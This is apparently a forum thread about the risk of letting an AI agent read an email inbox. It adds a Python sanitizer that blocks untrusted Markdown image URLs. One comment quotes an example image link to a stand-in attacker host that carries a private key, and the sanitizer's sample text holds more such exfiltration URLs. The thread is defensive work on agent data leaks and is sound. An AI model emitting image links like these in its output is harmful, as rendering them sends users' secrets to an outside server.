eli | 2 days ago

How does my email platform know which messages I want my agent to see and which are too sensitive?

I don't see how it's possible to securely give an agent access to your inbox unless it has zero ability to exfiltrate (not sending mail, not making any external network requests). Even then, you need to be careful with artifacts generated by the agent because a markdown file could transmit data when rendered.

oarsinsync|2 days ago

> a markdown file could transmit data when rendered.

This is a new threat vector to me. Can you tell me more?

adamckay|1 day ago

Your markdown file has an image that links to another server controlled by the attacker, and the path/query parameters you're attempting to render contain sensitive data.

    ![](https://the-attacker.com/steal?private-key=abc123def)
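
One way to defend against the image beacon described in this thread, as an added example that is not part of the original comments: before agent-generated Markdown is rendered, replace every image whose URL would cause a request to a host outside an allowlist. The allowlist host, the function names and the sample text are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: image hosts the rendering client trusts (hypothetical value).
ALLOWED_IMAGE_HOSTS = {"assets.example.internal"}

INLINE_IMG = re.compile(r'!\[[^\]]*\]\(\s*<?([^)\s>]+)>?[^)]*\)')
REF_IMG = re.compile(r'!\[([^\]]*)\](?:\[([^\]]*)\])?(?!\()')
REF_DEF = re.compile(r'^ {0,3}\[([^\]]+)\]:\s*<?(\S+?)>?(?:\s.*)?$', re.M)
HTML_IMG = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>', re.I)


def is_untrusted_fetch(url):
    """True if rendering this image URL would contact a non-allowlisted host."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return True  # unparseable URL: fail closed
    if parts.scheme in ("", "data") and not parts.netloc:
        return False  # relative path or inline data: URI, no outbound request
    return (parts.hostname or "").lower() not in ALLOWED_IMAGE_HOSTS


def sanitize_markdown(md):
    """Return (safe_markdown, blocked_urls) for agent-generated Markdown."""
    blocked = []
    refs = {m.group(1).lower(): m.group(2) for m in REF_DEF.finditer(md)}

    def check(url, original):
        if url and is_untrusted_fetch(url):
            blocked.append(url)  # keep for logging or alerting
            return "[image blocked]"
        return original

    md = INLINE_IMG.sub(lambda m: check(m.group(1), m.group(0)), md)
    md = REF_IMG.sub(lambda m: check(
        refs.get((m.group(2) or m.group(1)).lower()), m.group(0)), md)
    md = HTML_IMG.sub(lambda m: check(m.group(1), m.group(0)), md)
    return md, blocked


# Constructed sample of agent output; the first URL is the one quoted above.
SAMPLE = """Summary of your inbox.
![](https://the-attacker.com/steal?private-key=abc123def)
![chart][c]
<img src="//attacker.example/p?d=secret" width="1">
![logo](https://assets.example.internal/logo.png)

[c]: https://attacker.example/c?d=secret
"""
```

The regexes cover inline, reference-style and raw `<img>` images only; a renderer-side control such as a restrictive `img-src` Content Security Policy catches forms a text filter misses.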